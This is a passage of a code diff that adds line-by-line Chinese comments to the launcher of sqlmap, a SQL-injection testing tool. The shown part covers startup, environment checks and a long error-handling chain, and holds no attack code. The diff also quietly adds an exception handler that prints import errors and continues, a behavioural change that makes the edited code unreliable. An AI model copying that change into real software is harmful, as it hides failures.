+    from lib.core.common import checkPipedInput  # 从lib.core.common模块导入checkPipedInput函数，用于检查管道输入
+    from lib.core.common import checkSums  # 从lib.core.common模块导入checkSums函数，用于校验文件哈希值
+    from lib.core.common import createGithubIssue  # 从lib.core.common模块导入createGithubIssue函数，用于创建GitHub问题
+    from lib.core.common import dataToStdout  # 从lib.core.common模块导入dataToStdout函数，用于将数据输出到标准输出
+    from lib.core.common import extractRegexResult  # 从lib.core.common模块导入extractRegexResult函数，用于提取正则表达式匹配结果
+    from lib.core.common import filterNone  # 从lib.core.common模块导入filterNone函数，用于过滤None值
+    from lib.core.common import getDaysFromLastUpdate  # 从lib.core.common模块导入getDaysFromLastUpdate函数，用于计算自上次更新以来的天数
+    from lib.core.common import getFileItems  # 从lib.core.common模块导入getFileItems函数，用于从文件中读取内容
+    from lib.core.common import getSafeExString  # 从lib.core.common模块导入getSafeExString函数，用于安全地获取异常信息
+    from lib.core.common import maskSensitiveData  # 从lib.core.common模块导入maskSensitiveData函数，用于屏蔽敏感数据
+    from lib.core.common import openFile  # 从lib.core.common模块导入openFile函数，用于打开文件
+    from lib.core.common import setPaths  # 从lib.core.common模块导入setPaths函数，用于设置文件路径
+    from lib.core.common import weAreFrozen  # 从lib.core.common模块导入weAreFrozen函数，用于检查程序是否被冻结（打包）
+    from lib.core.convert import getUnicode  # 从lib.core.convert模块导入getUnicode函数，用于将字符串转换为Unicode格式
+    from lib.core.common import setColor  # 从lib.core.common模块导入setColor函数，用于设置输出颜色
+    from lib.core.common import unhandledExceptionMessage  # 从lib.core.common模块导入unhandledExceptionMessage函数，用于处理未捕获的异常信息
+    from lib.core.compat import LooseVersion  # 从lib.core.compat模块导入LooseVersion类，用于版本号比较
+    from lib.core.compat import xrange  # 从lib.core.compat模块导入xrange函数，用于兼容Python 2和3的range函数
+    from lib.core.data import cmdLineOptions  # 从lib.core.data模块导入cmdLineOptions对象，用于存储命令行选项
+    from lib.core.data import conf  # 从lib.core.data模块导入conf对象，用于存储配置信息
+    from lib.core.data import kb  # 从lib.core.data模块导入kb对象，用于存储知识库信息
+    from lib.core.datatype import OrderedSet  # 从lib.core.datatype模块导入OrderedSet类，用于存储有序集合
+    from lib.core.enums import MKSTEMP_PREFIX  # 从lib.core.enums模块导入MKSTEMP_PREFIX常量，表示临时文件前缀
+    from lib.core.exception import SqlmapBaseException  # 从lib.core.exception模块导入SqlmapBaseException类，表示sqlmap的基础异常
+    from lib.core.exception import SqlmapShellQuitException  # 从lib.core.exception模块导入SqlmapShellQuitException类，表示shell退出异常
+    from lib.core.exception import SqlmapSilentQuitException  # 从lib.core.exception模块导入SqlmapSilentQuitException类，表示静默退出异常
+    from lib.core.exception import SqlmapUserQuitException  # 从lib.core.exception模块导入SqlmapUserQuitException类，表示用户退出异常
+    from lib.core.option import init  # 从lib.core.option模块导入init函数，用于初始化选项
+    from lib.core.option import initOptions  # 从lib.core.option模块导入initOptions函数，用于初始化命令行选项
+    from lib.core.patch import dirtyPatches  # 从lib.core.patch模块导入dirtyPatches函数，用于应用临时补丁
+    from lib.core.patch import resolveCrossReferences  # 从lib.core.patch模块导入resolveCrossReferences函数，用于解决交叉引用问题
+    from lib.core.settings import GIT_PAGE  # 从lib.core.settings模块导入GIT_PAGE常量，表示GitHub页面地址
+    from lib.core.settings import IS_WIN  # 从lib.core.settings模块导入IS_WIN常量，表示当前操作系统是否为Windows
+    from lib.core.settings import LAST_UPDATE_NAGGING_DAYS  # 从lib.core.settings模块导入LAST_UPDATE_NAGGING_DAYS常量，表示提醒更新的天数
+    from lib.core.settings import LEGAL_DISCLAIMER  # 从lib.core.settings模块导入LEGAL_DISCLAIMER常量，表示法律声明
+    from lib.core.settings import THREAD_FINALIZATION_TIMEOUT  # 从lib.core.settings模块导入THREAD_FINALIZATION_TIMEOUT常量，表示线程结束的超时时间
+    from lib.core.settings import UNICODE_ENCODING  # 从lib.core.settings模块导入UNICODE_ENCODING常量，表示默认的Unicode编码
+    from lib.core.settings import VERSION  # 从lib.core.settings模块导入VERSION常量，表示程序版本号
+    from lib.parse.cmdline import cmdLineParser  # 从lib.parse.cmdline模块导入cmdLineParser函数，用于解析命令行参数
+    from lib.utils.crawler import crawl  # 从lib.utils.crawler模块导入crawl函数，用于爬取数据
+except Exception as ex:  # 捕获所有异常
+    print("An error occurred: " + str(ex))  # 打印异常信息
+except KeyboardInterrupt:  # 捕获用户中断（如按下Ctrl+C）
+    errMsg = "user aborted"  # 定义错误信息
+
+    if "logger" in globals():  # 如果logger对象已定义
+        logger.critical(errMsg)  # 记录严重错误信息
+        raise SystemExit  # 退出程序
+    else:  # 如果logger对象未定义
+        import time  # 导入time模块
+        sys.exit("\r[%s] [CRITICAL] %s" % (time.strftime("%X"), errMsg))  # 退出程序并打印错误信息，包含当前时间
+
+def modulePath():  # 定义modulePath函数，用于获取程序的目录路径
     """
+    获取程序的目录路径，即使使用了 py2exe 进行冻结打包也能正确获取。
 
+    返回值：
+    返回程序所在目录的Unicode编码路径字符串。
+    """
     try:
-        _ = sys.executable if weAreFrozen() else __file__
-    except NameError:
-        _ = inspect.getsourcefile(modulePath)
+        # 如果程序被py2exe冻结，则使用sys.executable获取路径；否则使用__file__获取
+        _ = sys.executable if weAreFrozen() else __file__  # 如果程序被冻结，使用sys.executable获取路径；否则使用__file__获取当前文件路径
+    except NameError:  # 如果__file__未定义（在某些环境下可能发生），则执行以下代码
+        # 如果__file__未定义（在某些环境下可能发生），则使用inspect模块获取当前函数的文件路径
+        _ = inspect.getsourcefile(modulePath)  # 使用inspect模块获取当前函数的源文件路径
 
-    return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
+    # 获取_的目录路径，并转换为Unicode编码
+    return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)  # 返回_的目录路径，并将其转换为Unicode编码
+
+def checkEnvironment():  # 定义checkEnvironment函数，用于检查运行环境是否适合运行sqlmap
+    """
+    检查运行环境是否适合运行 sqlmap。
 
-def checkEnvironment():
+    如果在检查过程中发现问题，则会记录错误信息并退出程序。
+    """
     try:
-        os.path.isdir(modulePath())
-    except UnicodeEncodeError:
-        errMsg = "your system does not properly handle non-ASCII paths. "
-        errMsg += "Please move the sqlmap's directory to the other location"
-        logger.critical(errMsg)
-        raise SystemExit
-
-    if LooseVersion(VERSION) < LooseVersion("1.0"):
-        errMsg = "your runtime environment (e.g. PYTHONPATH) is "
-        errMsg += "broken. Please make sure that you are not running "
-        errMsg += "newer versions of sqlmap with runtime scripts for older "
-        errMsg += "versions"
-        logger.critical(errMsg)
-        raise SystemExit
-
-    # Patch for pip (import) environment
-    if "sqlmap.sqlmap" in sys.modules:
-        for _ in ("cmdLineOptions", "conf", "kb"):
-            globals()[_] = getattr(sys.modules["lib.core.data"], _)
-
-        for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"):
-            globals()[_] = getattr(sys.modules["lib.core.exception"], _)
+        # 检查程序目录是否存在
+        os.path.isdir(modulePath())  # 检查modulePath函数返回的路径是否为目录
+    except UnicodeEncodeError:  # 如果系统无法正确处理非ASCII路径，则执行以下代码
+        # 如果系统无法正确处理非ASCII路径，则记录错误信息并退出
+        errMsg = "your system does not properly handle non-ASCII paths. "  # 定义错误信息，提示系统无法处理非ASCII路径
+        errMsg += "Please move the sqlmap's directory to the other location"  # 建议用户将sqlmap目录移动到其他位置
+        logger.critical(errMsg)  # 记录严重错误信息
+        raise SystemExit  # 退出程序
+
+    # 检查sqlmap的版本是否低于1.0，如果是，则说明运行环境有问题
+    if LooseVersion(VERSION) < LooseVersion("1.0"):  # 如果当前版本低于1.0
+        errMsg = "your runtime environment (e.g. PYTHONPATH) is "  # 定义错误信息，提示运行环境有问题
+        errMsg += "broken. Please make sure that you are not running "  # 建议用户检查是否使用了旧版本的运行脚本
+        errMsg += "newer versions of sqlmap with runtime scripts for older "  # 提示用户不要使用旧版本的运行脚本运行新版本的sqlmap
+        errMsg += "versions"  # 提示用户检查运行环境
+        logger.critical(errMsg)  # 记录严重错误信息
+        raise SystemExit  # 退出程序
+
+    # 如果是通过pip安装的sqlmap，则需要对sys.modules进行一些修补操作
+    if "sqlmap.sqlmap" in sys.modules:  # 如果sqlmap.sqlmap模块已加载
+        for _ in ("cmdLineOptions", "conf", "kb"):  # 遍历需要修补的变量名
+            # 将lib.core.data模块中的cmdLineOptions、conf、kb变量添加到全局变量中
+            globals()[_] = getattr(sys.modules["lib.core.data"], _)  # 将lib.core.data模块中的变量添加到全局变量中
+
+        for _ in ("SqlmapBaseException", "SqlmapShellQuitException", "SqlmapSilentQuitException", "SqlmapUserQuitException"):  # 遍历需要修补的异常类名
+            # 将lib.core.exception模块中的异常类添加到全局变量中
+            globals()[_] = getattr(sys.modules["lib.core.exception"], _)  # 将lib.core.exception模块中的异常类添加到全局变量中
 
 def main():
     """
-    Main function of sqlmap when running from command line.
+    当从命令行运行时，这是 sqlmap 的主函数。
     """
 
     try:
-        dirtyPatches()
-        resolveCrossReferences()
-        checkEnvironment()
-        setPaths(modulePath())
-        banner()
-
-        # Store original command line options for possible later restoration
-        args = cmdLineParser()
-        cmdLineOptions.update(args.__dict__ if hasattr(args, "__dict__") else args)
-        initOptions(cmdLineOptions)
-
-        if checkPipedInput():
-            conf.batch = True
-
-        if conf.get("api"):
-            # heavy imports
-            from lib.utils.api import StdDbOut
-            from lib.utils.api import setRestAPILog
-
-            # Overwrite system standard output and standard error to write
-            # to an IPC database
-            sys.stdout = StdDbOut(conf.taskid, messagetype="stdout")
-            sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
-
-            setRestAPILog()
-
-        conf.showTime = True
-        dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True)
-        dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True)
-
-        init()
-
-        if not conf.updateAll:
-            # Postponed imports (faster start)
-            if conf.smokeTest:
-                from lib.core.testing import smokeTest
-                os._exitcode = 1 - (smokeTest() or 0)
-            elif conf.vulnTest:
-                from lib.core.testing import vulnTest
-                os._exitcode = 1 - (vulnTest() or 0)
+        # 应用脏补丁和解析交叉引用
+        dirtyPatches()  # 应用一些临时的修复或补丁
+        resolveCrossReferences()  # 解析并处理代码中的交叉引用
+        
+        # 检查运行环境并设置程序路径
+        checkEnvironment()  # 检查当前运行环境是否满足要求
+        setPaths(modulePath())  # 设置程序的路径
+        banner()  # 显示程序的横幅信息
+
+        # 解析命令行参数并更新全局配置
+        args = cmdLineParser()  # 解析命令行参数
+        cmdLineOptions.update(args.__dict__ if hasattr(args, "__dict__") else args)  # 更新全局命令行选项
+        initOptions(cmdLineOptions)  # 初始化全局配置选项
+
+        # 如果有管道输入，则设置批量模式
+        if checkPipedInput():  # 检查是否有管道输入
+            conf.batch = True  # 如果有管道输入，则设置批量模式为True
+
+        # 如果配置了API，设置API日志和重定向标准输出和错误
+        if conf.get("api"):  # 检查是否配置了API
+            # 延迟导入（重量级导入）
+            from lib.utils.api import StdDbOut  # 导入StdDbOut类，用于重定向标准输出和错误
+            from lib.utils.api import setRestAPILog  # 导入setRestAPILog函数，用于设置API日志
+
+            # 重定向标准输出和错误到IPC数据库
+            sys.stdout = StdDbOut(conf.taskid, messagetype="stdout")  # 重定向标准输出到IPC数据库
+            sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")  # 重定向标准错误到IPC数据库
+
+            setRestAPILog()  # 设置API日志
+
+        # 设置显示时间并显示法律声明和启动信息
+        conf.showTime = True  # 设置显示时间
+        dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True)  # 显示法律声明
+        dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True)  # 显示启动信息
+
+        # 初始化程序
+        init()  # 调用初始化函数，完成程序的初始化工作
+
+        # 如果没有设置更新所有选项，则执行后续操作
+        if not conf.updateAll:  # 检查是否设置了更新所有选项
+            # 延迟导入（更快的启动）
+            if conf.smokeTest:  # 检查是否设置了烟雾测试
+                # 运行烟雾测试
+                from lib.core.testing import smokeTest  # 导入烟雾测试函数
+                os._exitcode = 1 - (smokeTest() or 0)  # 运行烟雾测试并设置退出码
+            elif conf.vulnTest:  # 检查是否设置了漏洞测试
+                # 运行漏洞测试
+                from lib.core.testing import vulnTest  # 导入漏洞测试函数
+                os._exitcode = 1 - (vulnTest() or 0)  # 运行漏洞测试并设置退出码
             else:
-                from lib.controller.controller import start
-                if conf.profile:
-                    from lib.core.profiling import profile
-                    globals()["start"] = start
-                    profile()
+                # 启动sqlmap控制器
+                from lib.controller.controller import start  # 导入启动控制器函数
+                if conf.profile:  # 检查是否设置了性能分析
+                    # 如果设置了性能分析，则进行性能分析
+                    from lib.core.profiling import profile  # 导入性能分析函数
+                    globals()["start"] = start  # 将start函数添加到全局命名空间
+                    profile()  # 运行性能分析
                 else:
                     try:
-                        if conf.crawlDepth and conf.bulkFile:
-                            targets = getFileItems(conf.bulkFile)
+                        # 如果设置了爬取深度和批量文件，则开始爬取
+                        if conf.crawlDepth and conf.bulkFile:  # 检查是否设置了爬取深度和批量文件
+                            targets = getFileItems(conf.bulkFile)  # 从批量文件中获取目标列表
 
-                            for i in xrange(len(targets)):
-                                target = None
+                            for i in xrange(len(targets)):  # 遍历目标列表
+                                target = None  # 初始化目标变量
 
                                 try:
-                                    kb.targets = OrderedSet()
-                                    target = targets[i]
+                                    kb.targets = OrderedSet()  # 初始化目标集合
+                                    target = targets[i]  # 获取当前目标
 
-                                    if not re.search(r"(?i)\Ahttp[s]*://", target):
-                                        target = "http://%s" % target
+                                    if not re.search(r"(?i)\Ahttp[s]*://", target):  # 检查目标是否包含协议
+                                        target = "http://%s" % target  # 如果没有协议，则添加默认的HTTP协议
 
-                                    infoMsg = "starting crawler for target URL '%s' (%d/%d)" % (target, i + 1, len(targets))
-                                    logger.info(infoMsg)
+                                    infoMsg = "starting crawler for target URL '%s' (%d/%d)" % (target, i + 1, len(targets))  # 生成日志信息
+                                    logger.info(infoMsg)  # 记录日志信息
 
-                                    crawl(target)
-                                except Exception as ex:
-                                    if target and not isinstance(ex, SqlmapUserQuitException):
-                                        errMsg = "problem occurred while crawling '%s' ('%s')" % (target, getSafeExString(ex))
-                                        logger.error(errMsg)
+                                    crawl(target)  # 开始爬取目标
+                                except Exception as ex:  # 捕获异常
+                                    if target and not isinstance(ex, SqlmapUserQuitException):  # 检查异常类型
+                                        errMsg = "problem occurred while crawling '%s' ('%s')" % (target, getSafeExString(ex))  # 生成错误信息
+                                        logger.error(errMsg)  # 记录错误信息
                                     else:
-                                        raise
+                                        raise  # 重新抛出异常
                                 else:
-                                    if kb.targets:
-                                        start()
+                                    if kb.targets:  # 检查目标集合是否非空
+                                        start()  # 启动控制器
                         else:
-                            start()
-                    except Exception as ex:
-                        os._exitcode = 1
-
-                        if "can't start new thread" in getSafeExString(ex):
-                            errMsg = "unable to start new threads. Please check OS (u)limits"
-                            logger.critical(errMsg)
-                            raise SystemExit
+                            start()  # 如果没有设置爬取深度和批量文件，则直接启动控制器
+                    except Exception as ex:  # 捕获异常
+                        os._exitcode = 1  # 设置退出码为1
+
+                        # 如果无法启动新线程，则记录错误信息并退出
+                        if "can't start new thread" in getSafeExString(ex):  # 检查异常信息是否包含无法启动新线程
+                            errMsg = "unable to start new threads. Please check OS (u)limits"  # 生成错误信息
+                            logger.critical(errMsg)  # 记录严重错误信息
+                            raise SystemExit  # 退出程序
                         else:
-                            raise
+                            raise  # 重新抛出异常
 
-    except SqlmapUserQuitException:
-        if not conf.batch:
-            errMsg = "user quit"
-            logger.error(errMsg)
+    # 捕获并处理各种异常，记录错误信息并退出
+    except SqlmapUserQuitException:  # 捕获用户主动退出的异常
+        if not conf.batch:  # 检查是否处于批量模式
+            errMsg = "user quit"  # 生成错误信息
+            logger.error(errMsg)  # 记录错误信息
 
-    except (SqlmapSilentQuitException, bdb.BdbQuit):
-        pass
+    except (SqlmapSilentQuitException, bdb.BdbQuit):  # 捕获静默退出或调试器退出的异常
+        pass  # 不处理，直接跳过
 
-    except SqlmapShellQuitException:
-        cmdLineOptions.sqlmapShell = False
+    except SqlmapShellQuitException:  # 捕获SQLMap Shell退出的异常
+        cmdLineOptions.sqlmapShell = False  # 设置SQLMap Shell选项为False
 
-    except SqlmapBaseException as ex:
-        errMsg = getSafeExString(ex)
-        logger.critical(errMsg)
+    except SqlmapBaseException as ex:  # 捕获SQLMap基础异常
+        errMsg = getSafeExString(ex)  # 获取安全的异常信息
+        logger.critical(errMsg)  # 记录严重错误信息
 
-        os._exitcode = 1
+        os._exitcode = 1  # 设置退出码为1
 
-        raise SystemExit
+        raise SystemExit  # 退出程序
 
-    except KeyboardInterrupt:
+    except KeyboardInterrupt:  # 捕获键盘中断异常（如Ctrl+C）
         try:
-            print()
-        except IOError:
-            pass
-
-    except EOFError:
-        print()
-
-        errMsg = "exit"
-        logger.error(errMsg)
-
-    except SystemExit as ex:
-        os._exitcode = ex.code or 0
-
-    except:
-        print()
-        errMsg = unhandledExceptionMessage()
-        excMsg = traceback.format_exc()
-        valid = checkSums()
-
-        os._exitcode = 255
-
-        if any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")):
-            errMsg = "memory exhaustion detected"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded", "Disk full while accessing")):
-            errMsg = "no space left on output device"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif any(_ in excMsg for _ in ("The paging file is too small",)):
-            errMsg = "no space left for paging file"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("Access is denied", "subprocess", "metasploit")):
-            errMsg = "permission error occurred while running Metasploit"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("Permission denied", "metasploit")):
-            errMsg = "permission error occurred while using Metasploit"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "Read-only file system" in excMsg:
-            errMsg = "output device is mounted as read-only"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "Insufficient system resources" in excMsg:
-            errMsg = "resource exhaustion detected"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "OperationalError: disk I/O error" in excMsg:
-            errMsg = "I/O error on output device"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "Violation of BIDI" in excMsg:
-            errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "Invalid IPv6 URL" in excMsg:
-            errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1]
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "_mkstemp_inner" in excMsg:
-            errMsg = "there has been a problem while accessing temporary files"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp", "tempfile.py")):
-            errMsg = "unable to write to the temporary directory '%s'. " % tempfile.gettempdir()
-            errMsg += "Please make sure that your disk is not full and "
-            errMsg += "that you have sufficient write permissions to "
-            errMsg += "create temporary files and/or directories"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "Permission denied: '" in excMsg:
-            match = re.search(r"Permission denied: '([^']*)", excMsg)
-            errMsg = "permission error occurred while accessing file '%s'" % match.group(1)
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")):
-            errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) "
-            errMsg += "(Reference: 'https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe')"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "invalid maximum character passed to PyUnicode_New" in excMsg and re.search(r"\A3\.[34]", sys.version) is not None:
-            errMsg = "please upgrade the Python version (>= 3.5) "
-            errMsg += "(Reference: 'https://bugs.python.org/issue18183')"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")):
-            errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) "
-            errMsg += "(Reference: 'https://github.com/PyMySQL/PyMySQL/issues/700')"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "must be pinned buffer, not bytearray" in excMsg:
-            errMsg = "error occurred at Python interpreter which "
-            errMsg += "is fixed in 2.7. Please update accordingly "
-            errMsg += "(Reference: 'https://bugs.python.org/issue8104')"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("OSError: [Errno 22] Invalid argument: '", "importlib")):
-            errMsg = "unable to read file '%s'" % extractRegexResult(r"OSError: \[Errno 22\] Invalid argument: '(?P<result>[^']+)", excMsg)
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "hash_randomization" in excMsg:
-            errMsg = "error occurred at Python interpreter which "
-            errMsg += "is fixed in 2.7.3. Please update accordingly "
-            errMsg += "(Reference: 'https://docs.python.org/2/library/sys.html')"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "AttributeError: unable to access item" in excMsg and re.search(r"3\.11\.\d+a", sys.version):
-            errMsg = "there is a known issue when sqlmap is run with ALPHA versions of Python 3.11. "
-            errMsg += "Please downgrade to some stable Python version"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("Resource temporarily unavailable", "os.fork()", "dictionaryAttack")):
-            errMsg = "there has been a problem while running the multiprocessing hash cracking. "
-            errMsg += "Please rerun with option '--threads=1'"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "can't start new thread" in excMsg:
-            errMsg = "there has been a problem while creating new thread instance. "
-            errMsg += "Please make sure that you are not running too many processes"
-            if not IS_WIN:
-                errMsg += " (or increase the 'ulimit -u' value)"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "can't allocate read lock" in excMsg:
-            errMsg = "there has been a problem in regular socket operation "
-            errMsg += "('%s')" % excMsg.strip().split('\n')[-1]
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("pymysql", "configparser")):
-            errMsg = "wrong initialization of 'pymsql' detected (using Python3 dependencies)"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("ntlm", "socket.error, err", "SyntaxError")):
-            errMsg = "wrong initialization of 'python-ntlm' detected (using Python2 syntax)"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("drda", "to_bytes")):
-            errMsg = "wrong initialization of 'drda' detected (using Python3 syntax)"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "'WebSocket' object has no attribute 'status'" in excMsg:
-            errMsg = "wrong websocket library detected"
-            errMsg += " (Reference: 'https://github.com/sqlmapproject/sqlmap/issues/4572#issuecomment-775041086')"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("window = tkinter.Tk()",)):
-            errMsg = "there has been a problem in initialization of GUI interface "
-            errMsg += "('%s')" % excMsg.strip().split('\n')[-1]
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif any(_ in excMsg for _ in ("unable to access item 'liveTest'",)):
-            errMsg = "detected usage of files from different versions of sqlmap"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif any(_ in errMsg for _ in (": 9.9.9#",)):
-            errMsg = "LOL xD"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif kb.get("dumpKeyboardInterrupt"):
-            raise SystemExit
-
-        elif any(_ in excMsg for _ in ("Broken pipe",)):
-            raise SystemExit
-
-        elif valid is False:
-            errMsg = "code checksum failed (turning off automatic issue creation). "
-            errMsg += "You should retrieve the latest development version from official GitHub "
-            errMsg += "repository at '%s'" % GIT_PAGE
-            logger.critical(errMsg)
-            print()
-            dataToStdout(excMsg)
-            raise SystemExit
-
-        elif any(_ in "%s\n%s" % (errMsg, excMsg) for _ in ("tamper/", "waf/", "--engagement-dojo")):
-            logger.critical(errMsg)
-            print()
-            dataToStdout(excMsg)
-            raise SystemExit
-
-        elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "<frozen", "Can't find file for module", "SAXReaderNotAvailable", "<built-in function compile> returned NULL without setting an exception", "source code string cannot contain null bytes", "No module named", "tp_name field", "module 'sqlite3' has no attribute 'OperationalError'")):
-            errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("SyntaxError: Non-ASCII character", ".py on line", "but no encoding declared")):
-            errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("FileNotFoundError: [Errno 2] No such file or directory", "cwd = os.getcwd()")):
-            errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("PermissionError: [WinError 5]", "multiprocessing")):
-            errMsg = "there is a permission problem in running multiprocessing on this system. "
-            errMsg += "Please rerun with '--disable-multi'"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("No such file", "_'")):
-            errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1]
-            errMsg += "You should retrieve the latest development version from official GitHub "
-            errMsg += "repository at '%s'" % GIT_PAGE
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("No such file", "sqlmap.conf", "Test")):
-            errMsg = "you are trying to run (hidden) development tests inside the production environment"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif all(_ in excMsg for _ in ("HTTPNtlmAuthHandler", "'str' object has no attribute 'decode'")):
-            errMsg = "package 'python-ntlm' has a known compatibility issue with the "
-            errMsg += "Python 3 (Reference: 'https://github.com/mullender/python-ntlm/pull/61')"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")):
-            errMsg = "there has been a problem in enumeration. "
-            errMsg += "Because of a considerable chance of false-positive case "
-            errMsg += "you are advised to rerun with switch '--flush-session'"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "database disk image is malformed" in excMsg:
-            errMsg = "local session file seems to be malformed. Please rerun with '--flush-session'"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "AttributeError: 'module' object has no attribute 'F_GETFD'" in excMsg:
-            errMsg = "invalid runtime (\"%s\") " % excMsg.split("Error: ")[-1].strip()
-            errMsg += "(Reference: 'https://stackoverflow.com/a/38841364' & 'https://bugs.python.org/issue24944#msg249231')"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        elif "bad marshal data (unknown type code)" in excMsg:
-            match = re.search(r"\s*(.+)\s+ValueError", excMsg)
-            errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "")
-            errMsg += ". Please delete .pyc files on your system to fix the problem"
-            logger.critical(errMsg)
-            raise SystemExit
-
-        for match in re.finditer(r'File "(.+?)", line', excMsg):
-            file_ = match.group(1)
+            print()  # 打印空行
+        except IOError:  # 捕获IO错误
+            pass  # 不处理，直接跳过
+
+    except EOFError:  # 捕获文件结束异常（如Ctrl+D）
+        print()  # 打印空行
+
+        errMsg = "exit"  # 生成错误信息
+        logger.error(errMsg)  # 记录错误信息
+
+    except SystemExit as ex:  # 捕获系统退出异常
+        os._exitcode = ex.code or 0  # 设置退出码为异常代码或0
+
+    except:  # 捕获所有其他异常
+        print()  # 打印空行
+        errMsg = unhandledExceptionMessage()  # 获取未处理异常的信息
+        excMsg = traceback.format_exc()  # 获取异常的详细堆栈信息
+        valid = checkSums()  # 检查校验和
+
+        os._exitcode = 255  # 设置退出码为255
+
+        # 如果异常信息中包含内存耗尽相关的消息，则记录内存耗尽错误并退出
+        if any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")):  # 检查异常信息是否包含内存耗尽
+            errMsg = "memory exhaustion detected"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含磁盘空间不足相关的消息，则记录磁盘空间错误并退出
+        elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded", "Disk full while accessing")):  # 检查异常信息是否包含磁盘空间不足
+            errMsg = "no space left on output device"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含分页文件空间不足的消息，则记录分页文件空间错误并退出
+        elif any(_ in excMsg for _ in ("The paging file is too small",)):  # 检查异常信息是否包含分页文件空间不足
+            errMsg = "no space left for paging file"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含权限拒绝和Metasploit相关的消息，则记录Metasploit权限错误并退出
+        elif all(_ in excMsg for _ in ("Access is denied", "subprocess", "metasploit")):  # 检查异常信息是否包含Metasploit权限错误
+            errMsg = "permission error occurred while running Metasploit"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
+            raise SystemExit  # 退出程序
+
+        # 如果异常信息中包含权限拒绝和metasploit相关的消息，则记录Metasploit权限错误并退出
+        elif all(_ in excMsg for _ in ("Permission denied", "metasploit")):  # 检查异常信息是否包含Metasploit权限错误
+            errMsg = "permission error occurred while using Metasploit"  # 生成错误信息
+            logger.critical(errMsg)  # 记录严重错误信息
